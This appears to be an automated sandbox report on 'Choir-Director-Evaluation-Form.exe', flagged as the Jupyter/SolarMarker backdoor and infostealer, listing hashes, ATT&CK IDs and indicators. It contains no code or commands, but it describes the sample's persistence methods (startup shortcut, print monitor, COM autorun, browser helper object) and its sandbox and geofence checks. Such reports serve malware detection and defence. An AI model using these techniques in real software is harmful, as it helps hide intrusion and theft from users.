jupyter | 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1

Analysis

max time kernel
145s
max time network
149s
platform
windows10_x64
resource
win10v20210410
submitted
27-05-2021 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Choir-Director-Evaluation-Form.exe
Size

107.7MB
MD5

e4b18058271e4c9bfc7e3759a6132437
SHA1

70248c40ca94932a7f098a26ee7858bda5903d73
SHA256

8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1
SHA512

4bf709dc7e3e32d7a694732b60150ea97b834465a8074d6b3d4acab0633d3e6f2a96d211f04c58397032bf60e8b4e172c775c95b3afe8765f8e2f1b650c6a045

Score

10^/10

jupyter adware backdoor discovery persistence stealer trojan

Malware Config

Signatures

Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter
Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
43	3152	powershell.exe
44	2184	powershell.exe
45	4100	powershell.exe
55	3872	powershell.exe
43	3152	powershell.exe
44	2184	powershell.exe
45	4100	powershell.exe
55	3872	powershell.exe

Executes dropped EXE 10 IoCs

Processes:

Choir-Director-Evaluation-Form.tmpPDFescape_Desktop_Installer.exePDFescapeDesktopInstaller.exews.exeupdater-ws.exeprinter-installer-app.execreator-app.execreator-ws.exeescape.exews.exe

pid	process
1520	Choir-Director-Evaluation-Form.tmp
2824	PDFescape_Desktop_Installer.exe
3176	PDFescapeDesktopInstaller.exe
5484	ws.exe
6364	updater-ws.exe
7416	printer-installer-app.exe
10380	creator-app.exe
2076	creator-ws.exe
12644	escape.exe
12752	ws.exe

Registers new Print Monitor 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PDFescape_Desktop_Installer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	PDFescape_Desktop_Installer.exe

Drops startup file 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk	powershell.exe

Loads dropped DLL 64 IoCs

Processes:

Choir-Director-Evaluation-Form.tmpregsvr32.exeDllHost.exePDFescape_Desktop_Installer.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exews.exeMsiExec.exeupdater-ws.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeprinter-installer-app.exespoolsv.execreator-app.execreator-ws.exeescape.exe

pid	process
1520	Choir-Director-Evaluation-Form.tmp
1520	Choir-Director-Evaluation-Form.tmp
784	regsvr32.exe
4040	DllHost.exe
2824	PDFescape_Desktop_Installer.exe
12172	MsiExec.exe
4396	MsiExec.exe
4396	MsiExec.exe
4396	MsiExec.exe
4396	MsiExec.exe
4396	MsiExec.exe
780	MsiExec.exe
5144	MsiExec.exe
5484	ws.exe
5484	ws.exe
5484	ws.exe
5484	ws.exe
5484	ws.exe
5484	ws.exe
5484	ws.exe
5484	ws.exe
5484	ws.exe
5484	ws.exe
6088	MsiExec.exe
6364	updater-ws.exe
6364	updater-ws.exe
6364	updater-ws.exe
6364	updater-ws.exe
6364	updater-ws.exe
6364	updater-ws.exe
6364	updater-ws.exe
11144	MsiExec.exe
6032	MsiExec.exe
5136	MsiExec.exe
5232	MsiExec.exe
816	MsiExec.exe
5176	MsiExec.exe
4452	MsiExec.exe
7416	printer-installer-app.exe
1540
10640	spoolsv.exe
10640	spoolsv.exe
10640	spoolsv.exe
10380	creator-app.exe
10380	creator-app.exe
10380	creator-app.exe
10380	creator-app.exe
10380	creator-app.exe
2076	creator-ws.exe
2076	creator-ws.exe
2076	creator-ws.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe
12644	escape.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

Drops file in System32 directory 11 IoCs

Processes:

printer-installer-app.exespoolsv.exemsiexec.exe

description	ioc	process
File created	C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp	printer-installer-app.exe
File created	C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprn_v.4.12.26.3.dll	spoolsv.exe
File created	C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.dll	spoolsv.exe
File opened for modification	C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll	spoolsv.exe
File created	C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll	printer-installer-app.exe
File created	C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll	printer-installer-app.exe
File created	C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfpmon_v.4.12.26.3.dll	printer-installer-app.exe
File created	C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp	spoolsv.exe
File opened for modification	C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp	spoolsv.exe
File opened for modification	C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll	spoolsv.exe
File opened for modification	C:\Windows\SysWOW64\msvcp140_2.dll	msiexec.exe

Drops file in Program Files directory 64 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Program Files\PDFescape Desktop\sp\root\root.csp	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\AdobeStandardEncoding	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\sp\bl\bl.csp	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Core\Encodings\Big5Encoding	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Core\Templates\StickerPressed	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\ui-document-panel-layers.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Templates\StickerPressed	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Core\Encodings\AdobeExpertEncoding	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Core\Encodings\AdobeStandardEncoding	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\logger.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\pdfgraphics.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\plugins\plugin-text-markup.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\ui-options.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\web-link-store.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\localization\it\info.json	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\localization\pt\info.json	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\libidn.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\localization\de\icon.png	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\localization\it\messages.dat	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\plugins\plugin-acroform.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\ui-floating-toolbar.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\resources\Core\CMap\Identity-H	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\localization\ja\messages.dat	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\localization\Click on 'Change' to select default pdf handler.pdf	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Scripts\Common.js	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\pdfcore.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\localization\ja\info.json	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\localization\it\icon.png	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\localization\de\messages.dat	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\plugins-manager.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\ui.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\ui-document-panel-page-preview.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\bl.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Core\icudt58l.dat	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\GB2312Encoding	msiexec.exe
File opened for modification	C:\Program Files\PDFescape Desktop\brand.dll	msiexec.exe
File opened for modification	C:\Program Files\PDFescape Desktop\root-service-provider.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\localization\en\messages.dat	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\ui-document-panel-attachments.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\ui-engine.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\Big5Encoding	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\bl-creator-module.dll	msiexec.exe
File created	C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\crash-handler.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\localization\pt\icon.png	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\ui-creator-module.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\ui-scan.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\localization\pt\icon.png	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\settings.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\WansungEncoding	msiexec.exe
File created	C:\Program Files (x86)\PDFescape Desktop\crash-handler.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\htmlayout.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\pdfcore.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Core\Icons\sticker.normal.txt	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Core\Color\USWebCoatedSWOP.icc	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\AdobeExpertEncoding	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\creator\common\brand.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\bl-service-provider.dll	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Core\Encodings\JohabEncoding	msiexec.exe
File created	C:\Program Files\PDFescape Desktop\resources\Core\Encodings\MSSymbolEncoding	msiexec.exe

Drops file in Windows directory 64 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\enterprise_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File created	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\edit_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\business_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\convert_icon	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\ocr_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\edit_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\business_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File created	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\review_icon	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\ocr_icon	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\ocr_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File created	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\insert_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\forms_icon	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\install_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\concrt140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\secure_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\enterprise_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\concrt140.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\forms_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\concrt140.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\concrt140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\ocr_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\insert_icon	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140_1.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_1.dll.56E049E7_36C3_3941_98AD_414884F67502	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_1.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\asian_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\insert_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29	msiexec.exe
File created	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\create_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\asian_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\main_icon	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\vcruntime140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File opened for modification	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\edit_icon	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\business_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7B5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\edit_icon	msiexec.exe
File opened for modification	C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\install_icon	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\uninstall_icon	msiexec.exe
File created	C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exespoolsv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{f01fac5d-e5f6-485f-a8c6-27446425998c}\0002	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
